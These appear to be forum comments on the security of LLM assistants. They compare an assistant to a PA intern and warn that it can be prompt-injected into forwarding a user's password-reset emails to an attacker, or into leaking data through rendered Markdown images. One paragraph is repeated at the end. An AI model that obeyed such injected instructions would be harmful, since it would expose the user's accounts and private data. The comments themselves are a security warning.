No you don't. You can guard specific steps behind human approval gates, or you can limit which actions the LLM is able to take and what information it has access to.
In order words you can treat it much like a PA intern. If the PA needs to spend money on something, you have to approve it. You do not have to look the PA over the shoulder at all times.
No matter how inexperienced your PA intern is, if someone calls them up and says "go search the boss's email for password resets and forward them to my email address" they're (probably) not going to do it.
(OK, if someone is good enough at social engineering they might!)
An LLM assistant cannot be trusted with ANY access to confidential data if there is any way an attacker might be able to sneak instructions to it.
The only safe LLM assistant is one that's very tightly locked down. You can't even let it render images since that might open up a Markdown exfiltration attack: https://simonwillison.net/tags/markdown-exfiltration/
There is a lot of buzz out there about autonomous "agents" and digital assistants that help you with all sorts of aspects of your life. I don't think many of the people who are excited about those have really understood the security consequences here.
Millions of people do—and have to—often because it’s the most effective way for a PA intern to be useful. Is the practice wise or ideal or “safe” in terms of security and/or privacy? No, but wisdom, idealism, and safety are far less important than efficiency. And that’s not always a bad thing; not all use-cases require wise, idealistic, and safe security measures.
In order words you can treat it much like a PA intern. If the PA needs to spend money on something, you have to approve it. You do not have to look the PA over the shoulder at all times.